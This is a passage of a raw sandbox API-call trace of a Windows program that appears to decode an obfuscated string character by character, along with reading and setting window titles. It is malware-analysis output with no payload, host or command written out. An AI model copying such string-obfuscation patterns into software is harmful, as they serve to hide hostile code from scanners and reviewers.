pvarResult=0x28f1c0) returned 0x0 [0173.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.370] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.370] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.371] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.371] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.372] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.372] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.372] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.373] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.373] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0173.374] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.374] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.374] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.375] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.375] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.376] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.376] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.377] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.377] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.378] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.378] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.383] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.383] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.384] GetForegroundWindow () returned 0x10278 [0173.384] GetLastError () returned 0x0 [0173.384] SysStringLen (param_1=" ") returned 0xff [0173.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0173.384] SysStringLen (param_1=" ") returned 0xff [0173.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0173.384] GetWindowTextA (in: hWnd=0x10278, lpString=0x11644c4, nMaxCount=255 | out: lpString="Goal Join") returned 9 [0173.385] GetLastError () returned 0x0 [0173.385] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0173.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0173.386] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0173.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Goal Join") returned 256 [0173.386] SysStringLen (param_1="Go") returned 0x2 [0173.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Go", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Go", lpUsedDefaultChar=0x0) returned 3 [0173.387] SetWindowTextA (hWnd=0x103c4, lpString="Go") returned 1 [0173.387] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0173.387] GetFocus () returned 0x0 [0173.387] lstrlenA (lpString="Go") returned 2 [0173.387] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0173.387] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Ac") returned 2 [0173.388] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0173.388] GetFocus () returned 0x0 [0173.388] lstrcmpA (lpString1="Ac", lpString2="Go") returned -1 [0173.388] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0173.388] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0173.389] IsWindow (hWnd=0x103c4) returned 1 [0173.389] IsWindow (hWnd=0x103c4) returned 1 [0173.389] IsWindow (hWnd=0x103c4) returned 1 [0173.389] IsWindow (hWnd=0x103c4) returned 1 [0173.390] GetFocus () returned 0x0 [0173.390] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0173.390] GetFocus () returned 0x0 [0173.390] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0173.391] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0173.391] GetFocus () returned 0x0 [0173.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Go", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0173.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Go", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Go") returned 3 [0173.391] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0173.391] VarBstrCmp (bstrLeft="Go", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0173.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.392] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0173.393] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.393] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0173.393] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.500] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.500] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.501] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0173.501] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.502] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.502] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.502] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0173.503] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.513] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.513] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.514] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.514] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.514] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0173.515] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.515] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0173.516] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.516] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.517] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.517] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0173.518] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.518] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.518] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.530] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0173.531] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.531] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0173.532] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.532] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.533] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.533] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0173.534] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.534] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0173.545] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.545] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0173.546] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.546] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, 